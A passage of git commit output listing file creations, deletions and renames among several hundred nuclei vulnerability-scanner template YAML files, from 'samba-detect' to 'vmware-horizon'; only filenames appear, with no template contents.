nuclei-templates/Other/samba-detect.yaml delete mode 100644 nuclei-templates/Other/samsung-wlan-ap-default-credentials-9995.yaml create mode 100644 nuclei-templates/Other/samsung-wlan-ap-default-credentials.yaml create mode 100644 nuclei-templates/Other/samsung-wlan-ap-lfi-10003.yaml delete mode 100644 nuclei-templates/Other/samsung-wlan-ap-lfi-9999.yaml rename nuclei-templates/Other/{samsung-wlan-ap-rce-10004.yaml => samsung-wlan-ap-rce-10007.yaml} (100%) rename nuclei-templates/Other/{samsung-wlan-ap-xss.yaml => samsung-wlan-ap-xss-10012.yaml} (100%) delete mode 100644 nuclei-templates/Other/samsung-wlan-default-login-10018.yaml create mode 100644 nuclei-templates/Other/samsung-wlan-default-login.yaml delete mode 100644 nuclei-templates/Other/sangfor-ba-rce-10021.yaml create mode 100644 nuclei-templates/Other/sangfor-ba-rce.yaml create mode 100644 nuclei-templates/Other/sangfor-edr-rce-10028.yaml delete mode 100644 nuclei-templates/Other/sangfor-edr-rce-10030.yaml delete mode 100644 nuclei-templates/Other/sap-igs-detect-10040.yaml create mode 100644 nuclei-templates/Other/sap-igs-detect.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-detect-10047.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-detect.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-info-leak-10049.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-info-leak-10051.yaml rename nuclei-templates/Other/{sap-netweaver-portal-10055.yaml => sap-netweaver-portal.yaml} (100%) rename nuclei-templates/Other/{sap-netweaver-rce.yaml => sap-netweaver-rce(1).yaml} (100%) rename nuclei-templates/Other/{sap-netweaver-webgui-10058.yaml => sap-netweaver-webgui.yaml} (100%) create mode 100644 nuclei-templates/Other/sap-recon-detect-10062.yaml delete mode 100644 nuclei-templates/Other/sap-recon-detect-10063.yaml create mode 100644 nuclei-templates/Other/sap-redirect-10066.yaml delete mode 100644 nuclei-templates/Other/sap-redirect.yaml delete mode 100644 nuclei-templates/Other/sap-web-dispatcher-10078.yaml create mode 100644 nuclei-templates/Other/sap-web-dispatcher.yaml rename nuclei-templates/Other/{sapfiori-panel.yaml => sapfiori-panel-10033.yaml} (100%) create mode 100644 nuclei-templates/Other/sar2html-rce-10081.yaml delete mode 100644 nuclei-templates/Other/sar2html-rce.yaml delete mode 100644 nuclei-templates/Other/sassy-social-share-10086.yaml create mode 100644 nuclei-templates/Other/sassy-social-share-xss.yaml delete mode 100644 nuclei-templates/Other/sauter-login-10089.yaml create mode 100644 nuclei-templates/Other/sauter-login.yaml rename nuclei-templates/Other/{sceditor-detect-10094.yaml => sceditor-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/seacms-rce-10100.yaml create mode 100644 nuclei-templates/Other/seacms-rce-10101.yaml rename nuclei-templates/Other/{searches (copy 1).yaml => searchbar.yaml} (100%) rename nuclei-templates/Other/{secmail-detect-10112.yaml => secmail-detect.yaml} (100%) rename nuclei-templates/Other/{secnet-ac-default-login.yaml => secnet-ac-default-login-10113.yaml} (100%) create mode 100644 nuclei-templates/Other/securenvoy-panel-10114.yaml delete mode 100644 nuclei-templates/Other/securenvoy-panel-10116.yaml rename nuclei-templates/Other/{securityspy-detect.yaml => securityspy-detect-10119.yaml} (100%) rename nuclei-templates/Other/{selea-ip-camera-10135.yaml => selea-ip-camera-10133.yaml} (100%) rename nuclei-templates/Other/{selenium-exposure-10137.yaml => selenium-exposure-10138.yaml} (100%) rename nuclei-templates/Other/{sendgrid-api-11859.yaml => sendgrid-api(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/sensitive-storage-exposure-10143.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-exposure.yaml delete mode 100644 nuclei-templates/Other/seowon-router-rce-10147.yaml create mode 100644 nuclei-templates/Other/seowon-router-rce-10148.yaml rename nuclei-templates/Other/{server-backup-login-10156.yaml => server-backup-login.yaml} (100%) create mode 100644 nuclei-templates/Other/server-backup-manager-se-10159.yaml delete mode 100644 nuclei-templates/Other/server-backup-manager-se-10160.yaml delete mode 100644 nuclei-templates/Other/server-status-localhost-10163.yaml create mode 100644 nuclei-templates/Other/server-status-localhost-10166.yaml create mode 100644 nuclei-templates/Other/servfail-refused-hosts-10169.yaml delete mode 100644 nuclei-templates/Other/servfail-refused-hosts-10170.yaml delete mode 100644 nuclei-templates/Other/service-pwd-10176.yaml create mode 100644 nuclei-templates/Other/service-pwd.yaml delete mode 100644 nuclei-templates/Other/servicedesk-login-panel-10171.yaml create mode 100644 nuclei-templates/Other/servicedesk-login-panel-10173.yaml create mode 100644 nuclei-templates/Other/setup-page-exposure-10180.yaml delete mode 100644 nuclei-templates/Other/setup-page-exposure-10181.yaml create mode 100644 nuclei-templates/Other/shell-history-10192.yaml delete mode 100644 nuclei-templates/Other/shell-history.yaml rename nuclei-templates/Other/{Shipped100-sqli.yaml => shipped100-sqli.yaml} (100%) rename nuclei-templates/Other/{shopify-custom-token.yaml => shopify-custom-token-10198.yaml} (100%) create mode 100644 nuclei-templates/Other/shopify-shared-secret-11862.yaml delete mode 100644 nuclei-templates/Other/shopify-shared-secret.yaml rename nuclei-templates/Other/{shopify-token-10205.yaml => shopify-token.yaml} (100%) create mode 100644 nuclei-templates/Other/shoppable-token-10206.yaml delete mode 100644 nuclei-templates/Other/shoppable-token-10208.yaml create mode 100644 nuclei-templates/Other/shopware-detect-10213.yaml delete mode 100644 nuclei-templates/Other/shopware-detect.yaml rename nuclei-templates/Other/{shortcode-lfi.yaml => shortcode-lfi-10215.yaml} (100%) delete mode 100644 nuclei-templates/Other/shoutcast-server-10217.yaml create mode 100644 nuclei-templates/Other/shoutcast-server.yaml delete mode 100644 nuclei-templates/Other/showdoc-default-login-10219.yaml create mode 100644 nuclei-templates/Other/showdoc-default-login-10222.yaml create mode 100644 nuclei-templates/Other/showdoc-file-upload-rce-10225.yaml delete mode 100644 nuclei-templates/Other/showdoc-file-upload-rce-10229.yaml create mode 100644 nuclei-templates/Other/signatures-10251.yaml create mode 100644 nuclei-templates/Other/signatures-10263.yaml create mode 100644 nuclei-templates/Other/simple-employee-rce-10280.yaml delete mode 100644 nuclei-templates/Other/simple-employee-rce.yaml delete mode 100644 nuclei-templates/Other/simple-image-manipulator-lfi-10281.yaml create mode 100644 nuclei-templates/Other/simple-image-manipulator-lfi.yaml delete mode 100644 nuclei-templates/Other/simplebooklet-takeover-10271.yaml create mode 100644 nuclei-templates/Other/simplebooklet-takeover.yaml delete mode 100644 nuclei-templates/Other/site-map-sql-injection.yaml create mode 100644 nuclei-templates/Other/sitecore-debug-page-10284.yaml delete mode 100644 nuclei-templates/Other/sitecore-debug-page.yaml create mode 100644 nuclei-templates/Other/sitecore-version-10292.yaml delete mode 100644 nuclei-templates/Other/sitecore-version.yaml create mode 100644 nuclei-templates/Other/sitefinity-login-10295.yaml delete mode 100644 nuclei-templates/Other/sitefinity-login-10298.yaml create mode 100644 nuclei-templates/Other/sitemap-sql-injection.yaml delete mode 100644 nuclei-templates/Other/siteomat-login-10303.yaml create mode 100644 nuclei-templates/Other/siteomat-login.yaml create mode 100644 nuclei-templates/Other/skycaiji-admin-panel-10304.yaml delete mode 100644 nuclei-templates/Other/skycaiji-admin-panel.yaml rename nuclei-templates/Other/{sl-studio-lfi-10319.yaml => sl-studio-lfi.yaml} (100%) create mode 100644 nuclei-templates/Other/slack-bot-token-10313.yaml delete mode 100644 nuclei-templates/Other/slack-bot-token.yaml delete mode 100644 nuclei-templates/Other/slack-webhook(1).yaml create mode 100644 nuclei-templates/Other/slack-webhook-11865.yaml delete mode 100644 nuclei-templates/Other/slack.yaml delete mode 100644 nuclei-templates/Other/slocum-login-10316.yaml create mode 100644 nuclei-templates/Other/slocum-login.yaml rename nuclei-templates/Other/{smartjob-takeover-10325.yaml => smartjob-takeover-10322.yaml} (100%) rename nuclei-templates/Other/{smartling-takeover-10326.yaml => smartling-takeover-10327.yaml} (100%) delete mode 100644 nuclei-templates/Other/smartstore-detect-10333.yaml create mode 100644 nuclei-templates/Other/smartstore-detect-10334.yaml create mode 100644 nuclei-templates/Other/smb-v1-detection-10336.yaml delete mode 100644 nuclei-templates/Other/smb-v1-detection.yaml create mode 100644 nuclei-templates/Other/smugmug-takeover-10340.yaml delete mode 100644 nuclei-templates/Other/smugmug-takeover.yaml rename nuclei-templates/Other/{sniplets-xss-10344.yaml => sniplets-xss.yaml} (100%) delete mode 100644 nuclei-templates/Other/sofneta-mecdream-pacs-lfi-10350.yaml create mode 100644 nuclei-templates/Other/sofneta-mecdream-pacs-lfi.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-admin-1.yaml delete mode 100644 nuclei-templates/Other/solarwinds-default-admin-2.yaml delete mode 100644 nuclei-templates/Other/solarwinds-default-login-10355.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-login-10356.yaml create mode 100644 nuclei-templates/Other/solarwinds-servuftp-detect-10360.yaml delete mode 100644 nuclei-templates/Other/solarwinds-servuftp-detect.yaml create mode 100644 nuclei-templates/Other/solr-exposure-10363.yaml delete mode 100644 nuclei-templates/Other/solr-exposure-10364.yaml delete mode 100644 nuclei-templates/Other/solr-query-dashboard-10367.yaml create mode 100644 nuclei-templates/Other/solr-query-dashboard-10368.yaml delete mode 100644 nuclei-templates/Other/somfy-login-10371.yaml create mode 100644 nuclei-templates/Other/somfy-login.yaml rename nuclei-templates/Other/{sonarqube-login-10374.yaml => sonarqube-login-10376.yaml} (100%) create mode 100644 nuclei-templates/Other/sonarqube-token-10380.yaml delete mode 100644 nuclei-templates/Other/sonarqube-token-10382.yaml create mode 100644 nuclei-templates/Other/sonicwall-email-security-detect-10384.yaml delete mode 100644 nuclei-templates/Other/sonicwall-email-security-detect.yaml delete mode 100644 nuclei-templates/Other/sonicwall-management-panel-10387.yaml create mode 100644 nuclei-templates/Other/sonicwall-management-panel.yaml create mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock-10391.yaml delete mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock-10393.yaml create mode 100644 nuclei-templates/Other/spectracom-default-login-10406.yaml delete mode 100644 nuclei-templates/Other/spectracom-default-login.yaml rename nuclei-templates/Other/{sphider-login.yaml => sphider-login-10410.yaml} (100%) delete mode 100644 nuclei-templates/Other/splunk-enterprise-login-panel.yaml create mode 100644 nuclei-templates/Other/splunk-enterprise-panel.yaml create mode 100644 nuclei-templates/Other/splunk-login-10416.yaml delete mode 100644 nuclei-templates/Other/splunk-login-10418.yaml rename nuclei-templates/Other/{sponip-network-system-ping-rce.yaml => sponip-network-system-ping-rce-10421.yaml} (100%) delete mode 100644 nuclei-templates/Other/spoofable-spf-records-ptr-10424.yaml create mode 100644 nuclei-templates/Other/spoofable-spf-records-ptr-10426.yaml delete mode 100644 nuclei-templates/Other/spring-framework-exceptions-10493.yaml create mode 100644 nuclei-templates/Other/spring-framework-exceptions.yaml delete mode 100644 nuclei-templates/Other/spring-functions-rce.yaml delete mode 100644 nuclei-templates/Other/spring_collection.yaml delete mode 100644 nuclei-templates/Other/springboot-actuator-10434.yaml create mode 100644 nuclei-templates/Other/springboot-actuator-10435.yaml delete mode 100644 nuclei-templates/Other/springboot-actuators-jolokia-xxe-10428.yaml create mode 100644 nuclei-templates/Other/springboot-actuators-jolokia-xxe-10429.yaml create mode 100644 nuclei-templates/Other/springboot-autoconfig-10437.yaml delete mode 100644 nuclei-templates/Other/springboot-autoconfig.yaml rename nuclei-templates/Other/{springboot-beans-10441.yaml => springboot-beans-10438.yaml} (100%) delete mode 100644 nuclei-templates/Other/springboot-env-10450.yaml create mode 100644 nuclei-templates/Other/springboot-env-10451.yaml delete mode 100644 nuclei-templates/Other/springboot-gateway-10453.yaml create mode 100644 nuclei-templates/Other/springboot-gateway.yaml delete mode 100644 nuclei-templates/Other/springboot-h2-db-rce-10454.yaml create mode 100644 nuclei-templates/Other/springboot-h2-db-rce-10455.yaml delete mode 100644 nuclei-templates/Other/springboot-health-10460.yaml create mode 100644 nuclei-templates/Other/springboot-health.yaml delete mode 100644 nuclei-templates/Other/springboot-heapdump-10465.yaml delete mode 100644 nuclei-templates/Other/springboot-info-10470.yaml create mode 100644 nuclei-templates/Other/springboot-info.yaml delete mode 100644 nuclei-templates/Other/springboot-log4j-rce-10472.yaml create mode 100644 nuclei-templates/Other/springboot-log4j-rce.yaml create mode 100644 nuclei-templates/Other/springboot-loggers-10475.yaml delete mode 100644 nuclei-templates/Other/springboot-loggers.yaml rename nuclei-templates/Other/{springboot-mappings-10478.yaml => springboot-mappings-10480.yaml} (100%) delete mode 100644 nuclei-templates/Other/springboot-threaddump-10486.yaml create mode 100644 nuclei-templates/Other/springboot-threaddump.yaml delete mode 100644 nuclei-templates/Other/springboot-trace-10488.yaml create mode 100644 nuclei-templates/Other/springboot-trace-10492.yaml delete mode 100644 nuclei-templates/Other/sql-dump-10496.yaml create mode 100644 nuclei-templates/Other/sql-dump.yaml create mode 100644 nuclei-templates/Other/sql-monitor-10505.yaml delete mode 100644 nuclei-templates/Other/sql-monitor.yaml rename nuclei-templates/Other/{sql-server-reporting-10510.yaml => sql-server-reporting-10508.yaml} (100%) rename nuclei-templates/Other/{sql-injection.yaml => sqli.yaml} (100%) rename nuclei-templates/Other/{sqli_header-10504.yaml => sqliheader.yaml} (100%) rename nuclei-templates/Other/{square-access-token(1).yaml => square-access-token-11867.yaml} (100%) create mode 100644 nuclei-templates/Other/square.yaml create mode 100644 nuclei-templates/Other/squid-analysis-report-generator-10512.yaml delete mode 100644 nuclei-templates/Other/squid-analysis-report-generator-10513.yaml delete mode 100644 nuclei-templates/Other/squirrelmail-add-xss-10515.yaml create mode 100644 nuclei-templates/Other/squirrelmail-add-xss.yaml create mode 100644 nuclei-templates/Other/squirrelmail-lfi-10517.yaml delete mode 100644 nuclei-templates/Other/squirrelmail-lfi.yaml create mode 100644 nuclei-templates/Other/squirrelmail-vkeyboard-xss-10522.yaml delete mode 100644 nuclei-templates/Other/squirrelmail-vkeyboard-xss.yaml create mode 100644 nuclei-templates/Other/ssrf-via-oauth-misconfig-10526.yaml delete mode 100644 nuclei-templates/Other/ssrf-via-oauth-misconfig-10527.yaml rename nuclei-templates/Other/{ssrf-detection.yaml => ssrf_nagli.yaml} (100%) create mode 100644 nuclei-templates/Other/stackstorm-default-login-10529.yaml delete mode 100644 nuclei-templates/Other/stackstorm-default-login-10530.yaml delete mode 100644 nuclei-templates/Other/stem-audio-table-private-keys-10536.yaml create mode 100644 nuclei-templates/Other/stem-audio-table-private-keys.yaml create mode 100644 nuclei-templates/Other/strapi-documentation-10542.yaml delete mode 100644 nuclei-templates/Other/strapi-documentation-10543.yaml create mode 100644 nuclei-templates/Other/strapi-page-10545.yaml delete mode 100644 nuclei-templates/Other/strapi-page.yaml rename nuclei-templates/Other/{stripe-api-key(1).yaml => stripe-api-key-11869.yaml} (100%) delete mode 100644 nuclei-templates/Other/stripe-restricted-key-10555.yaml create mode 100644 nuclei-templates/Other/stripe-restricted-key.yaml rename nuclei-templates/Other/{stripe-secret-key-10558.yaml => stripe-secret-key.yaml} (100%) rename nuclei-templates/Other/{api-stripe.yaml => stripe.yaml} (100%) create mode 100644 nuclei-templates/Other/struts-debug-mode-10560.yaml delete mode 100644 nuclei-templates/Other/struts-debug-mode-10561.yaml create mode 100644 nuclei-templates/Other/struts-problem-report-10563.yaml delete mode 100644 nuclei-templates/Other/struts-problem-report.yaml create mode 100644 nuclei-templates/Other/sugarcrm-panel-10569.yaml delete mode 100644 nuclei-templates/Other/sugarcrm-panel-10571.yaml delete mode 100644 nuclei-templates/Other/supermicro-default-login-10572.yaml create mode 100644 nuclei-templates/Other/supermicro-default-login.yaml create mode 100644 nuclei-templates/Other/superset-default-login-10574.yaml delete mode 100644 nuclei-templates/Other/superset-default-login.yaml delete mode 100644 nuclei-templates/Other/supervpn-panel-10575.yaml create mode 100644 nuclei-templates/Other/supervpn-panel-10577.yaml create mode 100644 nuclei-templates/Other/suspicious-sql-error-messages-10585.yaml delete mode 100644 nuclei-templates/Other/suspicious-sql-error-messages-10586.yaml rename nuclei-templates/Other/{swagger-api-10595.yaml => swagger-api-10592.yaml} (100%) create mode 100644 nuclei-templates/Other/swagger-ui-bypass.yaml create mode 100644 nuclei-templates/Other/symantec-dlp-login-10596.yaml delete mode 100644 nuclei-templates/Other/symantec-dlp-login.yaml create mode 100644 nuclei-templates/Other/symantec-epm-login-10602.yaml delete mode 100644 nuclei-templates/Other/symantec-epm-login.yaml delete mode 100644 nuclei-templates/Other/symantec-ewep-login-10605.yaml create mode 100644 nuclei-templates/Other/symantec-ewep-login.yaml delete mode 100644 nuclei-templates/Other/symantec-messaging-gateway-10607.yaml create mode 100644 nuclei-templates/Other/symantec-pgp-global-directory-10611.yaml delete mode 100644 nuclei-templates/Other/symantec-pgp-global-directory-10613.yaml delete mode 100644 nuclei-templates/Other/symfony-database-config-10616.yaml create mode 100644 nuclei-templates/Other/symfony-database-config-10617.yaml delete mode 100644 nuclei-templates/Other/symfony-debugmode-10618.yaml create mode 100644 nuclei-templates/Other/symfony-debugmode-10623.yaml create mode 100644 nuclei-templates/Other/symfony-profiler-10625.yaml delete mode 100644 nuclei-templates/Other/symfony-profiler-10626.yaml delete mode 100644 nuclei-templates/Other/synology-web-station-10631.yaml create mode 100644 nuclei-templates/Other/synology-web-station-10632.yaml create mode 100644 nuclei-templates/Other/sysaid-help-desk.yaml rename nuclei-templates/Other/{szhe-default-login.yaml => szhe-default-login-10638.yaml} (100%) delete mode 100644 nuclei-templates/Other/tableau-panel-10642.yaml create mode 100644 nuclei-templates/Other/tableau-panel.yaml create mode 100644 "nuclei-templates/Other/tamronos iptv\347\263\273\347\273\237.yaml" rename nuclei-templates/Other/{tamronos-rce-10649.yaml => tamronos-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/targa-camera-ssrf-10657.yaml create mode 100644 nuclei-templates/Other/targa-camera-ssrf.yaml delete mode 100644 nuclei-templates/Other/tcpconfig-10663.yaml create mode 100644 nuclei-templates/Other/tcpconfig-10665.yaml delete mode 100644 nuclei-templates/Other/teamcity-registration-enabled-10667.yaml create mode 100644 nuclei-templates/Other/teamcity-registration-enabled.yaml create mode 100644 nuclei-templates/Other/teamwork-takeover-10669.yaml delete mode 100644 nuclei-templates/Other/teamwork-takeover-10671.yaml delete mode 100644 nuclei-templates/Other/tech-detect-10672.yaml create mode 100644 nuclei-templates/Other/tech-detect-10673.yaml delete mode 100644 nuclei-templates/Other/tectuus-scada-monitor-10682.yaml create mode 100644 nuclei-templates/Other/tectuus-scada-monitor.yaml delete mode 100644 nuclei-templates/Other/tekon-info-leak-10685.yaml create mode 100644 nuclei-templates/Other/tekon-info-leak.yaml delete mode 100644 nuclei-templates/Other/telerik-fileupload-detect-10692.yaml create mode 100644 nuclei-templates/Other/telerik-fileupload-detect-10694.yaml rename nuclei-templates/Other/{Tenda-leakage.yaml => tenda-leakage.yaml} (100%) rename nuclei-templates/Other/{teradici-pcoip-10702.yaml => teradici-pcoip.yaml} (100%) create mode 100644 nuclei-templates/Other/terraform-detect-10709.yaml delete mode 100644 nuclei-templates/Other/terraform-detect.yaml create mode 100644 nuclei-templates/Other/terraform-enterprise-panel-10712.yaml delete mode 100644 nuclei-templates/Other/terraform-enterprise-panel.yaml create mode 100644 nuclei-templates/Other/the-next.yaml rename nuclei-templates/Other/{thinkcmf_include.yaml => thinkCMF_include.yaml} (100%) delete mode 100644 nuclei-templates/Other/thinkcmf-detect.yaml create mode 100644 nuclei-templates/Other/thinkcmf-detection-10719.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-lfi (copy 1).yaml create mode 100644 nuclei-templates/Other/thinkcmf-rce-10725.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-rce-10729.yaml create mode 100644 nuclei-templates/Other/thinkcmf-workflow-10730.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-workflow.yaml delete mode 100644 nuclei-templates/Other/thinkific-redirect-10736.yaml create mode 100644 nuclei-templates/Other/thinkific-redirect-10737.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5022-rce-10746.yaml create mode 100644 nuclei-templates/Other/thinkphp-5022-rce-10747.yaml create mode 100644 nuclei-templates/Other/thinkphp-5023-rce-10749.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5023-rce-10751.yaml delete mode 100644 nuclei-templates/Other/thinkphp-509-information-disclosure-10752.yaml create mode 100644 nuclei-templates/Other/thinkphp-509-information-disclosure-10753.yaml create mode 100644 nuclei-templates/Other/threatq-login-10757.yaml delete mode 100644 nuclei-templates/Other/threatq-login.yaml create mode 100644 nuclei-templates/Other/thumbs-db-disclosure-10761.yaml delete mode 100644 nuclei-templates/Other/thumbs-db-disclosure-10762.yaml create mode 100644 nuclei-templates/Other/tianqing-info-leak-10765.yaml delete mode 100644 nuclei-templates/Other/tianqing-info-leak.yaml rename nuclei-templates/Other/{tictail-takeover-10769.yaml => tictail-takeover-10768.yaml} (100%) rename nuclei-templates/Other/{tidb-unauth-10772.yaml => tidb-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/tikiwiki-cms-10774.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-cms-10775.yaml create mode 100644 nuclei-templates/Other/tikiwiki-reflected-xss-10777.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-reflected-xss-10779.yaml create mode 100644 nuclei-templates/Other/tilda-takeover-10781.yaml delete mode 100644 nuclei-templates/Other/tilda-takeover-10782.yaml rename nuclei-templates/Other/{tileserver-gl-10786.yaml => tileserver-gl-10787.yaml} (100%) delete mode 100644 nuclei-templates/Other/time-based-sqli.yaml create mode 100644 nuclei-templates/Other/tin-canny-learndash-reporting.yaml rename nuclei-templates/Other/{api-tinypng.yaml => tinypng.yaml} (100%) rename nuclei-templates/Other/{titannit-web-rce.yaml => titannit-web-ssrf.yaml} (100%) delete mode 100644 nuclei-templates/Other/tomcat-default-login-10788.yaml create mode 100644 nuclei-templates/Other/tomcat-default-login-10789.yaml rename nuclei-templates/Other/{tomcat-detect.yaml => tomcat-detect-10794.yaml} (100%) create mode 100644 nuclei-templates/Other/tomcat-pathnormalization-10799.yaml delete mode 100644 nuclei-templates/Other/tomcat-pathnormalization-10800.yaml rename nuclei-templates/Other/{tomcat-scripts-10801.yaml => tomcat-scripts.yaml} (100%) rename nuclei-templates/Other/{tomcat-workflow-10805.yaml => tomcat-workflow.yaml} (100%) create mode 100644 nuclei-templates/Other/top-xss-params-10809.yaml delete mode 100644 nuclei-templates/Other/top-xss-params.yaml create mode 100644 nuclei-templates/Other/tos.yaml rename nuclei-templates/Other/{trace-axd-detect-10825.yaml => trace-axd-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/trace-method-10827.yaml create mode 100644 nuclei-templates/Other/trace-method-10829.yaml rename nuclei-templates/Other/{travis-ci-disclosure.yaml => travis-config.yaml} (100%) rename nuclei-templates/Other/{trilithic-viewpoint-login.yaml => trilithic-viewpoint-login-10839.yaml} (100%) rename nuclei-templates/Other/{tugboat-config-exposure.yaml => tugboat-config-exposure-10843.yaml} (100%) rename nuclei-templates/Other/{tumblr-takeover-10845.yaml => tumblr-takeover.yaml} (100%) create mode 100644 nuclei-templates/Other/turbocrm-xss-10848.yaml delete mode 100644 nuclei-templates/Other/turbocrm-xss-10850.yaml delete mode 100644 nuclei-templates/Other/twig-php-ssti-10856.yaml create mode 100644 nuclei-templates/Other/twig-php-ssti-10859.yaml delete mode 100644 nuclei-templates/Other/twilio-api-10861.yaml create mode 100644 nuclei-templates/Other/twilio-api.yaml create mode 100644 nuclei-templates/Other/twitter-secret-11870.yaml delete mode 100644 nuclei-templates/Other/twitter-secret.yaml create mode 100644 nuclei-templates/Other/twitter.yaml delete mode 100644 nuclei-templates/Other/txt-fingerprint-10863.yaml create mode 100644 nuclei-templates/Other/txt-fingerprint.yaml create mode 100644 nuclei-templates/Other/uberflip-takeover-10864.yaml delete mode 100644 nuclei-templates/Other/uberflip-takeover-10866.yaml rename nuclei-templates/Other/{ucmdb-default-login-10869.yaml => ucmdb-default-login-10868.yaml} (100%) create mode 100644 nuclei-templates/Other/ultimatemember-open-redirect-10877.yaml delete mode 100644 nuclei-templates/Other/ultimatemember-open-redirect.yaml delete mode 100644 nuclei-templates/Other/umbraco-base-ssrf-10882.yaml create mode 100644 nuclei-templates/Other/umbraco-base-ssrf.yaml delete mode 100644 nuclei-templates/Other/umbraco.yaml rename nuclei-templates/Other/{unauth-ftp.yaml => unauth-ftp-10942.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauth-hoteldruid-panel-10943.yaml create mode 100644 nuclei-templates/Other/unauth-hoteldruid-panel.yaml delete mode 100644 nuclei-templates/Other/unauth-message-read-10945.yaml create mode 100644 nuclei-templates/Other/unauth-message-read-10946.yaml create mode 100644 nuclei-templates/Other/unauth-rlm-10960.yaml delete mode 100644 nuclei-templates/Other/unauth-rlm.yaml delete mode 100644 nuclei-templates/Other/unauth-spark-api-10961.yaml create mode 100644 nuclei-templates/Other/unauth-spark-api-10963.yaml create mode 100644 nuclei-templates/Other/unauth-wavink-panel-10967.yaml delete mode 100644 nuclei-templates/Other/unauth-wavink-panel.yaml create mode 100644 nuclei-templates/Other/unauth-xproxy-dashboard-10968.yaml delete mode 100644 nuclei-templates/Other/unauth-xproxy-dashboard.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-alert-manager-10888.yaml create mode 100644 nuclei-templates/Other/unauthenticated-alert-manager.yaml create mode 100644 nuclei-templates/Other/unauthenticated-frp-10896.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-frp-10897.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-glances-10898.yaml create mode 100644 nuclei-templates/Other/unauthenticated-glances.yaml create mode 100644 nuclei-templates/Other/unauthenticated-glowroot-10900.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-glowroot-10902.yaml create mode 100644 nuclei-templates/Other/unauthenticated-influxdb-10903.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-influxdb.yaml rename nuclei-templates/Other/{unauthenticated-lansweeper-10904.yaml => unauthenticated-lansweeper-10906.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauthenticated-mongo-express-10908.yaml create mode 100644 nuclei-templates/Other/unauthenticated-mongo-express-10909.yaml create mode 100644 nuclei-templates/Other/unauthenticated-nacos-access-10912.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-nacos-access.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-netdata-10918.yaml create mode 100644 nuclei-templates/Other/unauthenticated-netdata.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-popup-upload-10921.yaml create mode 100644 nuclei-templates/Other/unauthenticated-popup-upload.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-prtg-10926.yaml create mode 100644 nuclei-templates/Other/unauthenticated-prtg-10927.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-varnish-cache-purge-10931.yaml create mode 100644 nuclei-templates/Other/unauthenticated-varnish-cache-purge-10933.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-zipkin-10935.yaml create mode 100644 nuclei-templates/Other/unauthenticated-zipkin.yaml rename nuclei-templates/Other/{unauthorized-h3csecparh-login-10949.yaml => unauthorized-h3csecparh-login.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthorized-hp-officepro-printer-10950.yaml delete mode 100644 nuclei-templates/Other/unauthorized-hp-officepro-printer.yaml delete mode 100644 nuclei-templates/Other/unauthorized-plastic-scm-10955.yaml create mode 100644 nuclei-templates/Other/unauthorized-plastic-scm-10957.yaml delete mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10958.yaml create mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10959.yaml rename nuclei-templates/Other/{unbounce-takeover-10970.yaml => unbounce-takeover-10971.yaml} (100%) create mode 100644 nuclei-templates/Other/unpatched-coldfusion-10977.yaml delete mode 100644 nuclei-templates/Other/unpatched-coldfusion.yaml create mode 100644 nuclei-templates/Other/upnp-device-10981.yaml delete mode 100644 nuclei-templates/Other/upnp-device.yaml create mode 100644 nuclei-templates/Other/ups-status-10985.yaml delete mode 100644 nuclei-templates/Other/ups-status.yaml delete mode 100644 nuclei-templates/Other/uptimerobot-takeover-10987.yaml create mode 100644 nuclei-templates/Other/uptimerobot-takeover.yaml create mode 100644 nuclei-templates/Other/urge-takeover-10990.yaml delete mode 100644 nuclei-templates/Other/urge-takeover.yaml rename nuclei-templates/Other/{vanguard-post-xss-10994.yaml => vanguard-post-xss-10992.yaml} (100%) rename nuclei-templates/Other/{vend-takeover-10997.yaml => vend-takeover-10996.yaml} (100%) delete mode 100644 nuclei-templates/Other/versa-default-login-11003.yaml create mode 100644 nuclei-templates/Other/versa-default-login.yaml delete mode 100644 nuclei-templates/Other/versa-sdwan-11005.yaml create mode 100644 nuclei-templates/Other/versa-sdwan.yaml create mode 100644 nuclei-templates/Other/vidyo-default-login-11009.yaml delete mode 100644 nuclei-templates/Other/vidyo-default-login-11010.yaml rename nuclei-templates/Other/{viewlinc-crlf-injection-11012.yaml => viewlinc-crlf-injection.yaml} (100%) rename nuclei-templates/Other/{viewpoint-system-status-11019.yaml => viewpoint-system-status-11018.yaml} (100%) rename nuclei-templates/Other/{vigor-login.yaml => vigor-login-11023.yaml} (100%) rename nuclei-templates/Other/{virtual-ema-detect-11024.yaml => virtual-ema-detect-11025.yaml} (100%) create mode 100644 nuclei-templates/Other/visualstudio.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-11040.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-11041.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-log4j-jndi-rce-11033.yaml delete mode 100644 